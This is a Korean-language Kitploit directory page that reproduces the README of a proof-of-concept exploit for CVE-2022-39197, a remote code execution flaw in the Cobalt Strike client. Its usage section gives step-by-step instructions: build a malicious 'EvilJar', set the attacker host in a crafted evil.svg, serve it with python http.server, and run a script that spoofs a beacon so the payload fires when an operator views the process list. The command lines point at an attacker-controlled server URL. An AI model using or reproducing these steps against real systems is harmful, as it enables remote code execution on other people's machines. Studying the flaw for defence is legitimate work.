Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2022-39197-RCE — CVE-2022-39197 RCE POC | Kitploit
도구/GitHubGitHub/thecryinggame/cve-2022-39197-rce
Vulnerability AnalysisExploitationWeb Application ExploitationCommand and ControlPayload Development
GitHubthecryinggame/cve-2022-39197-rce

CVE-2022-39197-RCE

CVE-2022-39197 RCE POC

저장소 보기
134543년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2022-39197-RCE

첫째

이 프로젝트는 @its-arun의 프로젝트 https://github.com/its-arun/CVE-2022-39197 에서 수정되었습니다.

스크립트를 테스트했을 때, frida 스크립트가 정상적인 순서로 데이터를 조회할 수 없다는 것을 발견했습니다. frida 스크립트를 수정하여 프로세스 이름을 수정하는 방식입니다.

이용 방법에 대한 기여를 해주신 Master @Kai5174 님께 감사드립니다.

사용법

  • Payload 준비
  1. EvilJar/src/main/java/Exploit.java 에서 명령어를 페이로드에 맞게 수정하세요. 현재는 계산기만 실행할 수 있습니다.

  2. jar 빌드: mvn clean compile assembly:single

  3. EvilJar/target/ 에서 EvilJar-1.0-jar-with-dependencies.jar 을 serve/ 폴더로 이동하세요.

  4. serve\evil.svg 에서 [attacker] 를 수정하세요.

도구 다운로드
  • python3 -m http.server 8080 으로 서빙하세요.

  • C2 버전이 4.7 이하인 상태로 beacon.exe를 생성하세요.

  • Windows에서 py 스크립트를 실행하여 온라인 상태가 되어야 하며, 클라이언트가 프로세스 목록에 접근하여 beacon.exe 프로세스를 볼 때 대응 조치를 수행해야 합니다.

    • Exploit 실행
    root@kitploit:~
    python3 -m pip install -r requirements.txt
    python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
    

    사용자가 프로세스 목록을 스크롤하는 즉시 Payload가 트리거됩니다.

    PoC

    Windows 1.png

    Mac 2.jpg

    참고 자료

    https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — 이 취약점에 대한 훌륭한 심층 분석이 있습니다. https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

    수정됨: https://github.com/its-arun/CVE-2022-39197